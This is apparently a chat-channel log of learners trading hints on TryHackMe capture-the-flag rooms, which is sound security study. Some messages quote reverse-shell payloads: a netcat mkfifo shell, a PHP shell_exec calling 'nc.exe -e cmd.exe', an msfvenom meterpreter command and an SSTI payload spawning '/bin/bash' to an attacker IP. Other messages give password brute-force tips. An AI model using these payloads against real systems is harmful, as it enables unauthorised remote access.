#room-hints

That's the point I'm making here

it's a pain to do

got it, point received, and appreciated

But as a box creator, it's possible

ok, so you would automate the browser as if it were a person being jack doing stuff

and thats how the payload would be executed as the one and only jacky boi, yea?

Ye

now i understand

thank you for your time Mr. Omniscient, sleep deprived, James

I'm not sleep deprived

This is about 6pm on my non-existent timezone

right but on everyone else's timezone where you are its like 5 am aint it?

4*, i looked it up 👀

Okay, I am on introductory networking room and doing well, but question 1 of section 5 makes no sense, plz help

do you know what the OSI model is?

yes

but it is asking for the protocol

Have you analyzed it with wire shark yet?

i may just be tired but it has me stumped lol

yes

have you followed the descriptions steps to look at the packets

if you look at the description of the task it shows you exactly how to find the protocol using wireshark

isn't the protocol ||http||

don’t know I haven’t done the room

okay well thank you for the help, I should get off soon it is 1am local time XD

just submit whatever wireshark says the protocol is

I figured it out

||I didn't check the packet numbers ||

Hello everyone, newbie here with a quick and hopefully easy question. Working on the Metasploit room and I seem to be stuck on the Task 4, question 7.
While that use command with the unique string can be incredibly useful that's not quite the exploit we want here. Let's now run the command 'search multi/handler'. What is the name of the column on the far left side of the console that shows up next to 'Name'? Go ahead and run the command 'use NUMBER_NEXT_TO exploit/multi/handler` wherein the number will be what appears in that far left column (typically this will be 4 or 5). In this way, we can use our search results without typing out the full name/path of the module we want to use.
When I run it on my kali vm (personal) I get 6, but that is not the correct number apparently. Probably because of a different version from when the room was created. Any ideas on how to figure this one out?

Read the question @silent trellis

The actual question doesn't ask for the number

Look for the question words and question mark.

wow thank you, I feel like a total idiot now lol

any hints on jeff ||jail break jeff user|| or i am in another ||rabbit-hole||

You're on the correct path, google || escaping rbash || and try some things

You're on the correct path, google || escaping rbash || and try some things
@wraith marsh googleing since morning, another hint would be nice.

Hey i am doing room blog and stuck at login i have username but is it donno about password

Do i need to brute it?

I tried with rockyou but it's since 1hr and didn't get any pass

I haven't completed the room but I'd suggest to keep looking for information whilst it's brute forcing in the background.

If brute forcing takes more than 5 minutes on THM (10 if your computer is slow or something) then it’s probably wrong

@lime needle

Room creators are told to keep brute forcing under 5 minutes

yeah i guess i am doing something wrong

Task 16 advent of code , after anonymous login to ftp can't really execute any commands tried passive mode -p didn't help. Does this mean there is some restriction on ftp ?

Switch vpn servers @white salmon

In polosmb3, when I get the id_rsa file and change permissions/try to connect to ssh with it, should I just be let in or am I meant to try getting a password as well?

If you look at the rsa key does it say it’s encrypted?

Not sure how to look for that.

Cat out the rsa key and see if it says the word “encrypted” anywhere 🙂

Oh you meant to cat it out.

Sorry. Long day.

It does not.

No sorry necessary

Then there’s no password

So if you get the username right you should be able to just ssh in

So that would mean I am doing something wrong with the login.

@oblique cliff I tried switching vpn server still same issue, is this known issue?

@cursive nexus most likely wrong username

I have john as the username but it still asks for password.

I haven’t done that room so idk for sure but if you have an unencrypted rsa key that’s the only thing I can think of

Try John, Johnny boi, jj

Idk random stuff

Should it hang if the username is incorrect?

@white salmon switch to passive mode? Uh I’ve seen some people having trouble with ftp sometimes the issue always seems to be using a different vpn server

some open ssh versions have username enumeration exploit

@cursive nexus it may? If it’s the incorrect username for the corresponding rsa key it’ll ask for a password. If it’s correct you’ll be logged in

@white salmon true but that doesn’t always work too well. If I had to guess it’s somewhere on the box

with passive mode

@oblique cliff Thank you for that. I managed to get in :)

Awesome! Wrong username?

@white salmon yes try switching vpn servers then

If that doesn’t work then #site-support

aight I'll try all servers

Awesome! Wrong username?
@oblique cliff Yeah. ||I'd copied over the .pub as well, read that and spotted the real one in there||

I need some hint on Blog (box released yesterday)!

what stage are you on?

i have tried brute forcing ,enumurating shares

used steg also on jpgs

didnt get anything!

smb is a rabbit hole

check http and the room tags

that should point you in the right direction

I got username

not all the room tags are visible in the dashboard, if you look at the api call you can find some more ||"tags":["cve 2019-8943","wordpress","blog","web","wpscan","linux","security","cutter","reverse engineering","binary exploitation"]||

tried everything bro anything else?

@wooden mist how can I get password for user in blog

have you tried wpscan @chilly mantle

ya got 2 usernames

if you don't have a shell then you haven't tried everything

have you read and understood the output of wpscan?

also wpscan -h

one of the other findings it gives you is helpful

might help you with the next step

@wooden mist Hi, I already have the shell in the machine (Blog room), I rode, rode and I can not find the way to the user, where can I look?

look for other routes

maybe the user is a rabbit hole 🤔

the additional room hints I posted up there might help you @merry helm

look for other routes
@wooden mist thank you

the additional room hints I posted up there might help you @merry helm
@median compass thank you

happy hunting

Man nobody has pinged me on the awesome video I left in SMB lol

I never thought of user being a rabbit hole lol

But sometimes the path to user is different than you'd expect

@wooden mist did you find the video?

Yes

Didn't play it tho

Ughhhhh

It was meant to be played!

I was in vc with some people and someone played it

Goat meme or smth

Yis

¯\_(ツ)_/¯

Well I thought it was funny my cat friend

For RA how do you figure out the username to reset the password. I tried all the ones in the webpage but none worked. Do you just guess names?

The username is somewhere on the page

Just not where you think it might be

Ok thanks. I'll look harder.

the user flag i found on jeff is wrong as per website.

hash it ;)

do what it says to do

Ah, i thought its over

almost

ufff... jeff you killed me dude. @blazing rune , thanks man.

I need some help in room blog, have credentials and by exploit in msf having an error as aborted .. thanks in advance

Show your options

I set option rhost ,lhost,user, passwd,targeturi

I set option rhost ,lhost,user, passwd,targeturi
@crisp wigeon Change payload and run again

show us your options

also, what payload did you choose?

i made sure that only one specific one will work

and if you do a little research about the Wordpress version, youll find it

not sure what research youve done, just offering tips

Can I get a hint what to do next after having reverse shell as www-data in room blog

priv esc

@verbal wedge i used that one playload ..googled some few are using that ..

i posted the full tips for the room earlier in here @astral cedar, that should give you a clue

^^

I didnt see them but i trust

@crisp wigeon something is wrong then. Can I see your whole options?

@astral cedar yeah privesc is next like Cry says

@verbal wedge shall i DM with pic.

??

Best hint i can give is its not your standard enum -> user -> root

yeha go for it

you can spoiler tag it too

images can be tagged

Thanks guys. I will try harder

you got this

i posted the full tips for the room earlier in here @astral cedar, that should give you a clue
@median compass How can I find it? When I search your name in dc nothing comes

not all the room tags are visible in the dashboard, if you look at the api call you can find some more ||"tags":["cve 2019-8943","wordpress","blog","web","wpscan","linux","security","cutter","reverse engineering","binary exploitation"]||
@median compass here you go

Thanks man

||i tried bruteforcing moms name in blog. checked about 3000 pass.Im i going the wrong path.?||

er, yes

it should find the pw in under 2 minutes

i m solving hackpark and trying to bruteforce|| web form|| using hydra. I have tried more than 10k passwords from big.txt.Am i doing anything wrong?

er, yes
@verbal wedge what about bill's username? 😦

why big.txt

is that even a password wordlist?

big.txt is for dirbuster

you wont get bjoel's

rockyou.txt is for passwords/custom wordlists

you wont get bjoel's
@verbal wedge oh

@true widget youre trying to use a directory wordlist for a password brute force try using rockyou as your wordlist

If you ever crack passwords on THM use rockyou.txt, unless told otherwise. All rooms use passwords that are in the rockyou.txt file.

okk initially I was using rockyou.txt but after a few thousands of passwords decided to use big.txt as I was unaware thats is a directory wordlists

For environments that contains a Wordpress is always good tone run wpscan, it will give you various information about the manager, users, themes... from that you follow with the enumeration

^

Oh man I am losing my mind. I cannot privESC. Can I get 1 more hint? maybe via DM if its too much for here

What have you tried

Found the emails of the billy and his mom bruteforce them ssh. Couldnt find anything useful with ||pspy64|| and ||LinEnum||.

Can someone help @crisp wigeon ? It seems his msf options are correct but he keeps erroring

@astral cedar you found nothing unusual with LinEnum?

That's surprising

tried to exploit Sudoers policy plugin version ||1.8.21p2||

I use linux-smart-enumeration instead

Try that

You'll find it

okay I will

And again. The path isn't always enum -> user -> root

That's a big hint

I think it will make sense a lot when I finish that room

Ye it will

It's also a hint

I'm surprised LinEnum didn't find it

It's like a big red flag

Literally

Maybe Its my mistake

In linpeas i think it’s a more subdued white flag in a sea of green.

Yeee

Guys Im doing Blue Room in nmap scan im using -A but scan doesnt showing service Version

They're showing as filtered

Filtered != open

You can't fingerprint a service that you can't talk to

Fix your VPN

ok

@verbal wedge So I'm banging on this suid for a while, and I can't identify which property to check it does, which is necessary (if the tip is feasible)? I've tried to identify it via radare, but nothing that's helped me...

|| strings ||

the box also has ltrace @merry helm, that might help too

Oh thanks @verbal wedge @median compass I still have a lot to learn about reverse engineering

trust me @merry helm, me too! 🙂

Me too lol

#resources has a lot pinned

This technically isn't true RE

The box I just submitted is though

it is RE

it's not true binex

Yeah that

hi I need help with the room rpmetasploit, everything went well untill the 'exploit' command. I am getting 'handler failed to bind to MY_IP_ON_TRYHACKME "

I just cant figure out what I am doing wrong

for "MY_IP_ON_TRYHACKME" I put in my tryhackme/access ip address

Don't trust that

Do IP a when you're connected to the VPN

ip a

you can also use set LHOST tun0 @late night

^^

Facts

that will set your local host to the address of your VPN interface automatically

I was advised by two awesome people not to use tun0 as it’s a hit or miss, bare that in mind ;)

Just type in the IP rather than typing tun0

i see a few ip address when I type "ip a' I tryed all of them and none of them worked

I'd say that the setting of LHOST is a bit hit and miss in general, that's just a metasploit quirk

tryed set LHOST tun0 and that did not work wither

seems like a hit or miss for you

either

@late night are you connected to the network through openvpn

In room "Network services", Task 7, Q5, i'm supposed to start a tcpdump using ||"sudo tcpdump ip proto \icmp -i tun0"|| ..
But i get ||tcpdump: tun0: No such device exists - (SIOCGIFHWADDR: No such device)||
How come?

You’re not connected to the vpn

I'm using the in-browser machine

when you do ip a do you see an interface called tun0 @late night?

ahhh, ok, then there's no VPN

In room "Network services", Task 7, Q5, i'm supposed to start a tcpdump using ||"sudo tcpdump ip proto \icmp -i tun0"|| ..
But i get ||tcpdump: tun0: No such device exists - (SIOCGIFHWADDR: No such device)||
How come?
@torn pine yes and everything else is working so far

@torn pine you should get told your IP address on the my machine website

You have to set it there I believe

But I haven’t used it so don’t quote me

what addresses do you see @late night?

@trim haven So the syntax for tcpdump is ||"sudo tcpdump [my own ip] proto \icmp -i tun0"||?

Nono

Not your zip

IP*

I’m pretty sure the Kali in browser machine tells you “use this IP”

let me rephrase the question @late night - can you copy the output of ip a here?

According to the awesome staff member James, it’s “Eth0” instead of tun0

ip a s and you'll see the adapters

It's the one with the 10.10

ye, i just figured 😂

but the syntax should still be || ip proto|| in the middle? and not the actual ip?

Or should it be ||[target machine ip] [some proto ive no idea which]||?

I will be honest

I have no clue

On what you’re saying

@torn pine just change the tun0 at the end to eth0 if you're not on a VPN and keep everything else the same

As I said

what you're doing is asking to see all the packets that match that bit in the middle (IP PROTOcol ICMP) that arrive on a particular interface

So it should still be "ip proto".. awesome

for most people that connect over a TUNnel from their own machine that interface is tun0

works now.. fuck me.. ive never used tcpdumps before and google didn't show shit 😄

thanks

well it wouldn't be fun if we weren't learning would it 🙂

happy hunting

Watch the language pls

let me rephrase the question @late night - can you copy the output of ip a here?
@median compass [*] exec: ip a

1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 08:00:27:23:ff:90 brd ff:ff:ff:ff:ff:ff
inet 10.0.2.15/24 brd 10.0.2.255 scope global dynamic noprefixroute eth0
valid_lft 81248sec preferred_lft 81248sec
inet6 fe80::a00:27ff:fe23:ff90/64 scope link noprefixroute
valid_lft forever preferred_lft forever

ok, so you want to set your LHOST to 10.0.2.15

No

That's a virtualbox internal NAT IP

Connect to the VPN on your attacking machine @late night

Not from the host

he's not using a VPN James, he's on the in browser kali box he said

That's a lie.

Because that IP is an internal virtualbox NAT IP

And cannot be the IP of a THM browser kali.

ok, so you want to set your LHOST to 10.0.2.15
@median compass tryed that too, didnt work

@late night you are using virtualbox, correct?

You need to connect to the TryHackMe openvpn from your virtual machine

he's not using a VPN James, he's on the in browser kali box he said
@median compass I didnt say I am using the browser kali. I am on my own VM using OpenVPN

yeah, you're right - so @late night you need to do `sudo openvpn <creds>.ovpn after getting connection details from https://tryhackme.com/connect?o=vpn

sorry, think I got you confused with the other guy asking questions at the same time, my bad

@median compass different perskn using the THM Kali

Ye

@late night I'm guessing you're running the VPN on your host os

For many reasons, that's bad

Run the VPN on your VM directly

For many reasons, that's bad
@stuck fractal out of curiosity.. why is this worse than through the VM? Only because of not broadcasting the whole host os to the VPN or any other reason?

Because your VPN IP then points to the host

Run the VPN on your VM directly
@stuck fractal THAT makes sense

So you need to port forward for reverse shells etc @torn pine

Aahhh, cause of the reverse shells... gotcha

You gloss over a lot of the connectivity stuff because your VM software does NAT

More than rev shells

also puts you in a different broadcast domain so things like sniffing traffic etc won't work

I can get OPENVPN on kali

👍🏻

Thanks soooo much, there were some other things that were comming out differently than it was supposed to. like I kept on getting more open ports when running nmap that I was supposed to

I can't get SKIDY's BACKDOOR working when posting the msfvenom payload into the telnet connection. Nothing shows on either my tcpdump or my netcat listener.. I would expect my netcat listener to become a shell? But absolutely nothing happens... I've triple checked the eth0 IP and nc port...
and even the payload ||mkfifo /tmp/sxbendj; nc 10.10.30.74 4444 0</tmp/sxbendj | /bin/sh >/tmp/sxbendj 2>&1; rm /tmp/sxbendj|| seems fine..
What am i doing wrong?

@torn pine You missed something curcial

😮

You need the prefix .RUN on your command

You're right!!.. thx! 😄

GOT IN !!! (and just got a phone call from the doctor that I have Carona 😦

yikes @late night ... congrats and commiserations both

🙂 the doc said I should live 🙂

GOT IN !!! (and just got a phone call from the doctor that I have Carona 😦
@late night dont worry, stay positive and fight back. You will be all right.

Thanks, I hope so

Blog room complete, thanks @median compass for the final clarifications

Grats :)

https://tenor.com/view/tommy-come-fly-with-me-sip-order-counter-gif-15040745

@merry helm can you say me one hint about Blog room ?

I have no idea how I do the privesc

@verbal wedge and @median compass can you help ?

yeet

which privesc

https://tryhackme.com/room/blog

that

which privesc

well which step

I'm on the user www-data

where are you at

okay

there we go

so uhhhh

have you run linpeas or linenum or linux-smart-enumeration?

that will give you your answer

ya, i runned linpeas

hmm

ok

i try linux-smart-enumeration

itll show there

okay, ty

hello im sorry to ask this late but i was wondering if i coold get a hint for the room Vulnversity, iv been having problems on how to find the version of the squid proxy that is runnning on the machine

Did you enumerate?

no

and i dont know how

Do RP Nmap

it says failed to resolved

im very close with the blog box. it says RCE-HERE and i got the js to execute but dono how to browse files after it ends? im not quite sure how it works fully. i seen one person who had a command prompt that poped up when he did it but mine didnt have one, any help would be great

it says failed to resolved
@proven pier wat

when i put RP Nmap wih the ip and make it run it says failed to resolved

no.

RP Nmap is a room that was suggested for you to do to teach you the skills that are needed to answer the questions you were asking about the room you are having trouble in

ohh ok im a idiot hahah

thank you il give it a try

youre probably not an idiot

anyone done blog yet?

yeah

what's your question?

so i executed the javascript and i got RCE-HERE on the wp page and it also said "open id-48" the way i seen someone else do it they automated it and had a cmd prompt pop up after the java executed. so im just stuck after doing that what i need to do next to get the exploit to work. if im even right. i feel like i am

did you read the tags for the box?

yes. im useing that exploit. just a diffrent one. because the msf mod wont work so i figured that wasent the way.

im useing the RIPS exploit

"riptechs"

msf keeps saying Exploit aborted due to failure: not-found: Failed to access Wordpress page to retrieve theme

metasploit should work

fwiw the msf module worked for me

wow. i spent all this time playing with Java..... gross..... ok well that should help alot now that i know that

manual way could be fun

@graceful sun if you have issues with it you can pm me if you want

it kinda is....i was really into it. but i just cant figure out how to do it. but it would be fun i think

thank you! @remote gate

has anyone had issues with Blaster not populating the IE history?

@sage belfry known issue

matt its a issue you have to configure to solve

matt its a issue you have to configure to solve
@brave bear No?

@sage belfry you can use an other exploit

idk for me it wasnt working either

when i rdped

i did restart a few times

is the XSS room finnicky or something? challenge 3 word hello is filtered, so this alert should work, but its not alerting me anything

nope its supposed to be that way i think

@brave bear theres nothing to configure is what james was saying, it is still a known issue

ohhh okaaay

is the XSS room finnicky or something? challenge 3 word hello is filtered, so this alert should work, but its not alerting me anything
@oblique cliff You have a js error

alert(hi)

alert("hi")

thanks guys

unless you define hi as hello

Which would be 10/10

@stuck fractal tried it with both double and single quotes

still nothing

No idea then

with that one you have to actually say hello

but its filtered

no i know, im just trying to get anyhting to appear as a POC

Tag me again in about 3s

sooo try innovative solutions

@stuck fractal ok...?

ohhh okaaay thats kinda weird yea

I'm not getting pings

Something broke

hmm

@stuck fractal

@stuck fractal

@stuck fractal

hehe

streamer mode?

a exploit from https://github.com/SecWiki/windows-kernel-exploits should work on blaster

long wall of text incoming

I need help with /room/reverseengineering
I got the 2 tasks down and third needs a lot of thought.

var_28h is a password inputed by the user to be compared against

1. What does cmp dword [var_28h], 2 actually do? Does it compare it literally? Or just the first or last bytes?
2. What do dl and al registers and why do they appear here out of nowhere? Do they point to the same registers lixe eax but with a different type?
3. How do I debug the program so I can input a word and see what the assembly code does to it?

This part is specially harder because I have no idea what it does:
moov eax, dword [var_28h]
cdqe
movzx edx, byte [rbp + rax - 0x20]
mov eax, dword[var_28h]
cdqe
movzx eax, byte [rbp + rax - 0x23]
cmp dl, al
je 0xetcetc

I just want some pointers what to research and learn further

I can answer question 2

https://en.wikibooks.org/wiki/X86_Assembly/X86_Architecture#General-Purpose_Registers_(GPR)_-_16-bit_naming_conventions

i've been trying my best with reverse-engineering and still hardly understand what anything does besides simple if conditionals and string comparisons

3. gdb or radare probably

yeah i'm using radare2

https://tryhackme.com/room/ccradare2

oh cool

looks like a good place to properly learn r2

ghidra is also a nice tool

the graphical menu with -VV from r2 is the only thing that helped me somewhat understand what the crackme3 file did

it's great

There's Cutter, which is a gui for radare

Cutter is luv

it has nice interface

If I wanted to set the password character length for hydra to just 8 characters, could I just run with -m 8 -M 8 as switches?

There's pw-inspector if you want to filter a wordlist

Looking that up now. Thank you uncle james ♥️

so for example: ps-inspector -i /usr/share/wordlists/rockyou.txt -o rockyou8.txt -m 8 -M 8 would work?

try it and find out

Like a charm, it worked.

anyone give me hint how to get user ||bjoel|| in rooms blog

anyone give me hint how to get user ||bjoel|| in rooms blog
@sick sun how far have you got so far?

room/rpsublist3r task :4 question: 5 what is it ?

I hope it's true channel

@tough willow again, no one will just give you the answer

People can help

And hint

But you're not going to get an answer to copy paste

what should I do ?

Put some work in?

Ask for a hint?

Tell us what you've tried?

Just I think

I can not recall it

What have you tried?

Have you looked at the output that's attached to the room?

Yes, I looked

no writeup

That's not what I asked

There is a file attached to that task

That file is the output of a command

You need to be looking through that file.

yes have a subdomains

i looked

So. Have you thought about which of those sub domains might be about web development?

hmm i'm thinking

You need to look at the file

It's obvious when you look

I think I should be idiot

Short the word "development" and then look harder

I am trying

@tough willow don't post answers here

okay sorry

Guys I need help with the room blog, anyone ?

That's not enough information to give you a hint

Ok can I ask here ?

What bit are you stuck at?

I enumerated usernames found an authenticated rce

Bruteforcing didn't give anything

Brute forcing what, exactly?

Wp login

For?

Using?

There's two users that you can easily find.

I found two users

Yep I did

Which did you attack by brute force?

What wordlists?

Both

Please please use spoiler tags.

Seclists top 1000 10 millilion pass list

When you're doing THM boxes, stick with rockyou

Try again.

@keen willow I'm not sure how to use that sry😬

Should take a maximum of 5 minutes to brute force

That's a rule thay box creators have to follow

Any brute force is under 5mins.

Argh thanks I'm using intruder for the sake of simplicity 😂

Ok I'll try with hydra thanks 🙌

Use wpscan

Designed for wordpress

Oh nice I forgot that thanks @stuck fractal

Unless you're told otherwise, assume rockyou if you're brute forcing

Thanks man @stuck fractal

I was looking for any information disclosure bug 😬

See if you can find the room creation guidance if you want to see behind the curtain a little.

@keen willow I'm not sure how to use that sry😬
@swift magnet wrap spoiler phrase inside two pipe symbol, or google it.

room/rpsublist3r task:4 quest:7

:(

@keen willow alright thanks

@tough willow do some research into the words and phrases mentioned in the question. These tasks are a test of your reading skills.

reading skills

Yes.

i liked it

:D

I just found the answer with some reading

:(

Read through the results, look for one that matches

You do need to put some effort in.

You're not going to be spoonfed answers

:((

If you're expecting to be spoonfed answers, you've chosen the wrong area of study

I will try only my head hurts

Take a break

okay
i will try again later

thanks

dude i found

i finished room

yey

@stuck fractal what do you mind man ?

||bruteforce pass in mysql||

You don't really have to ping James.. if you want to ask something you can just ask here

James is sleeping

Hello, I am new here. Can somebody explain why binary shiba1 doesn't execute?
shiba1@nootnoot:~$ ls .
b.txt noon.txt shiba1
shiba1@nootnoot:~$ ./shiba1
shiba1@nootnoot:~$ execute ./shiba1
execute: command not found
shiba1@nootnoot:~$ run ./sh

the binary should be executed like ./shiba1

but it'll work only if you have completed all the requrements from the task

I did, and after I type ./shiba1 it doesn't work

Box: Blog - I see others on here are getting the same error message on Metrasploit "Exploit failed: An exploitation error occurred", any ideas?

Oh, no, shame on me, file should have been noot and not noon

sorry for disturbing guys

@subtle terrace no worries you can disturb as much you want.. thats how a person learns ❤️ and we will be happy to help 🙂

Wow, that's called a SERVICE. My pleasure

In advent of cyber day 13 , edited one of the plugin files with shell.php got a connect but it gets stuck

Box: Blog - I see others on here are getting the same error message on Metrasploit "Exploit failed: An exploitation error occurred", any ideas?
@sturdy shadow I have the same issue. I’ve tried it manually but can’t get it working - I must be doing something wrong. It says it runs fine, and then code execution just does not happen.

I’m still trying but yeah minor issues aha

j

@sturdy shadow I have the same issue. I’ve tried it manually but can’t get it working - I must be doing something wrong. It says it runs fine, and then code execution just does not happen.
@potent quail Just added the .rb file from Searchsploit as a metasploit module but still the same error, baffled. Probably something simple I am missing:-(

@potent quail @sturdy shadow change the payload, it will help

@crisp wigeon mind if I message please?

go head

Working on "Blog" room. Am I right to be going via ||metasploit|| ? I can't seem to get the exploit to work

@hasty gust yeah you can use Metasploit for that one. If someone completes it manually do let me know

That js one didn't work as expected it should

Yeah I was looking at that too

Can I get reverse shell with this advent of cyber day 13 || echo shell_exec("nc.exe -e cmd.exe 10.9.56.17 1234");
||

I tried to use this || msfvenom -p php/meterpreter_reverse_tcp LHOST=10.9.56.17 LPORT=1234 -f raw > s.php || it connects but can't do anything after it

Tried some windows reverse shell from the internet they not working too, been stuck here since morning any hint please.

If the payload is failing for Blog then check the payload. I'm not sure what causes it to change but it should be meterpreter reverse tcp

Don't use redirection with raw payloads @white salmon

@verbal wedge I had it work with php rev meterpreter

That may work as well

That was the default, I haven't updated msf for a while

RP: burpsuite. Try logging in with invalid credentials. What error is generated when login fails?

help me to get this ?

Have you tried logging in with invalid credentials?

yes in heroku ,where to find the error?

In burp

Look for your request

Then look at the response

ok will see

anyone give me a hint to get user ||bjoel|| really stuck only and get user ||www-data||

@sick sun you've made an assumption.

Do standard privesc enumeration

Your goal from www-data should be to get anywhere at all

@stuck fractal i found ||SUID ca-bundle.crt|| from ||linpeas||

im on rabbit hole ?

No you're just wrong

That isn't going to be a suid binaru

It's crypto certificate stuff

Use context

yeah i know bro, i found some creds from ||config.php|| but not working and trying to bruteforce ||bjoel|| user pass from ||blog database|| but nothing

context ?

Context. Information like where you found it, what it's called, what the file type is

use pspy64s is good ?

to get some information

Do standard privesc enumeration
@stuck fractal
Your goal from www-data should be to get anywhere at all
@stuck fractal
There's your hints

oke thanks bro

Not your bro.

Anybody who completed blog room?

Don't ask to ask, just ask.

A lot of people here have completed it.

I need some kinda hint 😂

We can't give you a hint unless we know where you are.

@stuck fractal You mean "> s.php" this redirect? . Got shell with metasploit default payload but I'd like to do it manually too

@white salmon yes. You're outputting a binary from msfvenom, use the output flag rather than a redirect

Your binary will be fill of control characters and null bytes

It doesn't work with redirects

Ye when I cat the s.php it has weird things and the "<?php" part is commented out

@buoyant hatch just say at what stage you're on

Why the heck are you trying to make a php one?

I'd put it in the 404 page and get shell?

Use a windows one

You can log in with RDP. Why overcomplicate it.

Get a shell as a real user rather than the webserver user.

How do I upload .exe file?

I'm doing it manually without metasploit

There's a dozen ways

But you can use a webserver on your machine as one of them

Hi guys, please a hint for Blog room. I have the reverse shell with www-data user. i run linpeas, linenum, linux-smart-enumeration but i really don't understand how to privesc this room..

Gotcha start a local webserver and download exe from there , Can do this because both machines are in same local network. The box doesn't has internet I think?

You're correct

Thanks 😄

HI, I need a hint for blog room. I run Lse.sh for linx enumeration and I found ||/usr/sbin/checker||, is the right way?

Please mark as a spoiler

Done

maybe try going down the route and see if it's the right way yourself?

Where should I do the dir scan?

@buoyant hatch huh?

I am doing dir brute force, found nothing 😑

You won't find anything interesting

Yeah I know that from hint 😁 that's why I asked where should I do brureforce

Any hint

I am trying to do the christmas challenge but i cant find any cookies for the first day question:

What am i doing wrong?

You need to create an account

lel ok

Any hint for mr

Me

@buoyant hatch maybe trust your instincts and try things

🙄

You suggested something

Try that thing

stuck on the juiceshop portion of the Plethora room. Tried running this ||#{global.process.mainModule.require('child_process').exec('nc -e /bin/bash 127.0.0.1 4444')}|| from one of the writeups and replaced the IP with my tun0 IP but no shell in my listener. Am I headed in the right direction?

stuck on the juiceshop portion of the Plethora room. Tried running this ||#{global.process.mainModule.require('child_process').exec('nc -e /bin/bash 127.0.0.1 4444')}|| from one of the writeups and replaced the IP with my tun0 IP but no shell in my listener. Am I headed in the right direction?
@rotund skiff Fun fact. Juiceshop in a docker container breaks ||SSTI|| which is the vuln you're trying to exploit.

The room is broken, you're doing it right

Except nc -e rarely works

alright, so is there a working solution with the docker?

Nope

But you have access to the host OS, so you can get the flag via the container's filesystem

alright, thank you

im stuck after running lse in blog any hints?

@chilly mantle don’t post in multiple channels

didnt ||get|| reply

maybe wait more than 4 minutes?

You waited 3 minutes

ok have seen multiple people ask in both chats soo i posted

im stuck after running lse in blog any hints?
@chilly mantle Look at your results.

ok bro

Not your bro.

😂 👍

%never mind

Missing something important there.

🤨

Nah

People not trying at all first

Problem that's on the rise ATM

I am doing task 4, question 2, in room CC: Ghidra. I am having trouble determining "first variable set to". I see the function that should logically set it, but the answer is not correct. I expect the answer to be a two character, negative like number, but maybe my understanding is off

@serene light I haven’t done that room. But the * tell you how many characters the answer should be. So you can look at that as your hint, maybe?

Are you in the decompiler view or the assembly view?

yes it is 2 chars, @oblique cliff --trying the two i expect ... @stuck fractal decompiler

Are you being given the value in 0xsomething format?

That means it's hex

Gotcha that’s the extent of my help on this one then sorry

You might need to convert to decimal

but honestly I dont understand some of the code logic. hmmm. let me think on that decimal conversion for a second...

im expecting int, but will checkout decimal

An int is an integer

Decimal means base 10 it can still be an integer

Decimal isn't the datatype

It's the number base

decimal is what you use day-to-day

found ||/usr/sbin/checker|| and need some hint after that

@chilly mantle What do you think you should do with that file?

the answer field expects only 2 characters, not sure decimal will work

Huh?

if it's a number, then that's fine

The standard number system that you learnt to count in

@serene light I don’t think you understood what we meant by decimal. 10, 11, 12.

These are all decimal numbers

we don't mean like 0.1

That'd be a float or a double

basically, you might need to convert hex to a normal number

like 0x13 = 16+3 = 19

Google hex to decimal converter

yeah, definitely misunderstood...

Hello, I'm new and I just want to say I'm learning a lot just from reading you help other people. Thank you @stuck fractal @oblique cliff

Velkommen :)

Some of us who've studied computer science forget that most people don't know decimal/binary/hex

Read the task title @white salmon

https://tryhackme.com/room/zthlinux any hints?
https://i.imgur.com/11Y3eTI.png

The title tells you what you're talking about

Most likely Sudo

So you've been told about man pages and help options

Read those

If that doesn't work, do some googling

ok gonna check man sudo

I always thought it's su but apparently not 😂

That’s to switch users. Sudo is to run a command as a different user

Ahh

And sudo su can make you root, which is useful

yup makes sense

You can't log in as root on ubuntu by default

There's no password set

You have to become root using sudo or login using SSH keys

hi, i'm in room Blog and i'm stuck at the reverse of the checker. any hint?

Look at it in a decompiler

Look at system calls

ok thank you, i'll try

Hello, is the MACHINE_IP the public IP of the VM?

it is the IP of the machine none of the machines I know of have public IPS

Hello, is the MACHINE_IP the public IP of the VM?
@winged cypress You need to click deploy.

Thank you for the response. How do I find the MACHINE_IP of the VM I am working with? I use "ifconfig" but I am not sure which ip address I need to use.

it is the IP of the machine none of the machines I know of have public IPS
@solemn smelt Some do.

When you click "Deploy" in the room, it creates the VM

That will replace MACHINE_IP with the IP of the VM

I see, thank you very much!

That's the machine you're attacking

ifconfig gives you IPs for your machine

Your attacker machine

I am doing task 4, question 2, in room CC: Ghidra. I am having trouble determining "first variable set to". I see the function that should logically set it, but the answer is not correct. I expect the answer to be a two character, negative like number, but maybe my understanding is off
@serene light so decimal clarification was helpful. thanks everyone for that. I have determined the correct answer via accident, I am still trying to figure out the logic. not sure how much I can give away here, but I believe its due to a special character

Thank you @stuck fractal that really helps!

@stuck fractal i completed!

blog!

Hey there
in the room "25daysofchristmas" (2019 christmas challenge)
in the task 9 [day4]
subquestion 7
Any hints?

Context
I'm a user on a machine i am not root and i'm not a sudoers (running sudo -l echo me a srotty you cannot use sudo). The question is asking for the hash of the mcsysadmin. Easiest way i thought is to look in the etc/shadow file but im not root and i cant sudo. I theoretically get the hash trying the most common hash mode and generating the has for the passwd that i know, is it like that or am i going offroad adn there's an other way easier way?

@stuck fractal i completed!
@chilly mantle See what happens when you actually try?

Hey there
in the room "25daysofchristmas" (2019 christmas challenge)
in the task 9 [day4]
subquestion 7
Any hints?

Context
I'm a user on a machine i am not root and i'm not a sudoers (running sudo -l echo me a srotty you cannot use sudo). The question is asking for the hash of the mcsysadmin. Easiest way i thought is to look in the etc/shadow file but im not root and i cant sudo. I theoretically get the hash trying the most common hash mode and generating the has for the passwd that i know, is it like that or am i going offroad adn there's an other way easier way?
@turbid spruce Without knowing the salt, you can't generate their hash

forgot about salt and pepper yeah u right

There was a line in the supporting material. Sensitive system files are often backed up, with file extensions like .bak

No one cares about pepper

But try looking for .bak files

yeah thanks i'll do it right now, i appreciate it

Hi, I am doing the "Learn Linux" room. On Task 11 why do we need to create a noot.txt file to run a binary command for shiba1?

the command "./shiba1" means to execute a file called "shiba1" in the current directory, correct? But when using the command "ls", no such file is listed?

never mind, there is a shiba1 file.

Why does the room direct the user to create a noot.txt file, though?

On Task 11 why do we need to create a noot.txt file to run a binary command for shiba1? The binary checks that the file exists

If it does, you get the password

ahhh

A binary is just a program

Thank you.

That's very cool!

Computers are very cool indeed

fascinating!

